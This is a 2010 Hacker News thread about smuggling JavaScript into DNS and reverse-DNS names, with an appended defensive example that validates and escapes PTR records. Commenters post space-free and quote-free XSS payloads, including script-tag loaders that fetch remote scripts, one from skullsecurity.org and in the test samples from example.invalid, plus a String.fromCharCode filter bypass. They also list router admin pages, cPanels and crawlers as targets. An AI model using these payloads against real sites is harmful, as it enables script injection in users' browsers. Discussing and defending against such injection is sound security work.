Stuffing Javascript into DNS names (skullsecurity.org)
35 points by coderdude on Oct 5, 2010 | hide | past | favorite | 7 comments



Making a script tag load an arbitrary remote script file without a space:

    <script>s=document.createElement("script");
            s.setAttribute("src","http://www.skullsecurity.org/test-js.js");
            document.body.appendChild(s)</script>
For our convenience I put newlines in, just remove them. I checked it on the javascript: line (where you have to add javascript:, surround it with void(), and change the semicolons to commas). If that doesn't exactly work, something like it could. Any JS framework with the ability to use objects to set attributes on a new tag could write this more concisely, but this doesn't depend on any frameworks.


appendChild returns the appended child, so you can shorten that to the following:

    <script>document.body.appendChild(document.createElement("script")).src="http://www.skullsecurity.org/test-js.js"</script>


String.fromCharCode() can also be useful when some characters are stripped/escaped (such as quotes).

    document.write(String.fromCharCode(72,69,76,76,79));


The reverse DNS bit would be amazing. Do a bobby tables on it and watch sites fall just from visiting them.

Of course I wouldn't -do- such a thing, but it would be crazy to see.


They really mean it when they say "never trust user input".


Even though he only brings it up at the end, reverse DNS entries could end up being the scariest.


Other potential attack targets: admin UIs for routers, webhosting cpanels, web crawlers with DNS cache.
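The defensive side of the thread's point, as an added example that is not from any commenter or from the linked article: a UI that shows reverse-DNS (PTR) answers treats them as untrusted input, validating them against the hostname grammar and HTML-escaping them on output. It also shows that the "strip quotes and spaces" filter some UIs rely on is a no-op against the space-free, quote-free payloads quoted above. The sample names and the `example.invalid` URL are constructed.

```javascript
// Added example (not from the thread): treat reverse-DNS names as untrusted
// input before an admin UI, cPanel page or crawler log renders them as HTML.

// RFC 1123 label: letters, digits and hyphens, 1-63 chars, no leading or
// trailing hyphen. A whole name is at most 253 chars.
const LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

function isValidHostname(name) {
  if (typeof name !== "string" || name.length === 0 || name.length > 253) return false;
  const trimmed = name.endsWith(".") ? name.slice(0, -1) : name; // allow FQDN dot
  return trimmed.split(".").every((label) => LABEL.test(label));
}

// The naive filter: strip quotes and whitespace. It leaves the thread's
// payloads untouched, because they need neither quotes nor spaces.
function naiveFilter(name) {
  return name.replace(/["'\s]/g, "");
}

// Escaping for the HTML text/attribute context.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Render one PTR answer into a table cell: validate first, escape always.
function renderPtrCell(ptr) {
  const shown = isValidHostname(ptr) ? ptr : "(invalid PTR record)";
  return `<td>${escapeHtml(shown)}</td>`;
}

// Constructed samples: a legitimate name and the two payload styles above.
const SAMPLES = [
  "host-1.example.net.",
  '<script>document.body.appendChild(document.createElement("script")).src="http://example.invalid/x.js"</script>',
  "<script>document.write(String.fromCharCode(72,69,76,76,79))</script>",
];

for (const s of SAMPLES) {
  console.log(isValidHostname(s) ? "valid  " : "invalid", renderPtrCell(s));
}
```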



